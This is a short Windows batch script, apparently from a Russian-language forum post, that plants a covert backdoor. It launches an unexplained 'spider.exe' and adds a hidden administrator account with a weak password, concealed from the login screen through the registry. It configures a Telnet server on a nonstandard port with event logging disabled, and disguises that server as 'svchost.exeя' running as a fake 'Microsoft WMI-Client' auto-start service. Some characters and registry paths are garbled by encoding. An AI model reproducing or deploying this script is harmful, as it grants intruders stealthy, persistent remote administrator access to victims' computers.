Код:
@echo off 
@start %windir%/system32/spider.exe 
net localgroup TelnetClients /add 
net user Admin 123456 /add 
net localgroup ¤¬ЁЁбва в®ал Admin /add 
net localgroup TelnetClients Admin /add 
Windows Registry Editor Version 5.00 > C:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] >> C:System.reg  
"Admin"=dword:00000000 >> c:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer 1.0]>> c:System.reg 
"LoginScript"=hex(2):63,00,6d,00,64,00,00,00>> c:System.reg  
"TelnetPort"=dword:00006987>> c:System.reg  
"MaxConnections"=dword:0000000A>> c:System.reg  
"EventLoggingEnabled"=dword:00000000>> c:System.reg  
"DisconnectKillAllApps"=dword:00000000>> c:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer 1.0ReadConfig]>> c:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer Defaults]>> c:System.reg  
regedit /s c:System.reg && DEL c:System.reg  
COPY %windir%system32tlntsvr.exe %windir%system32"svchost.exeя" 
assoc .exeя=exefile 
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto 
"svchost.exeя" /service 
sc description WMI-Client "Microsoft WMI-Client" 
sc start WMI-Client